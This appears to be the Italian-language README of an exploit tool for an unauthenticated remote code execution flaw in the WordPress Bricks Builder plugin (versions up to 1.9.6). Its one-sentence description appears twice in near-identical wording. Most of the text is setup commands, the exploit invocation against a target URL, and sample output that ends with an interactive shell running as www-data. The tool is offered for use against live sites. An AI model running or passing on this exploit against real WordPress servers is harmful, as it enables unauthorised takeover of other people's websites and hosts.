
Vulnerabilità di esecuzione di codice remoto non autenticata in WordPress Bricks Builder <= 1.9.6. L'endpoint di rendering dei template accetta codice PHP senza autenticazione, permettendo l'esecuzione arbitraria di comandi come utente del server web.
Vulnerabilità di esecuzione remota di codice non autenticata in WordPress Bricks Builder <= 1.9.6. L'endpoint di rendering dei template accetta codice PHP senza autenticazione, consentendo l'esecuzione arbitraria di comandi come utente del server web.
python3 -m venv venv
source venv/bin/activate
python3 -m pip install requests beautifulsoup4 prompt_toolkit
python3 exploit.py -u http://TARGET
Esempio:
$ python3 exploit.py -u http://10.10.10.10
[*] Fetching nonce from http://10.10.10.10 ...
[*] Checking if the target is vulnerable...
[+] Target is vulnerable!
[+] Shell opened. Type 'exit' or Ctrl+C to quit.
Shell> id
uid=33(www-data) gid=33(www-data) groups=33(www-data)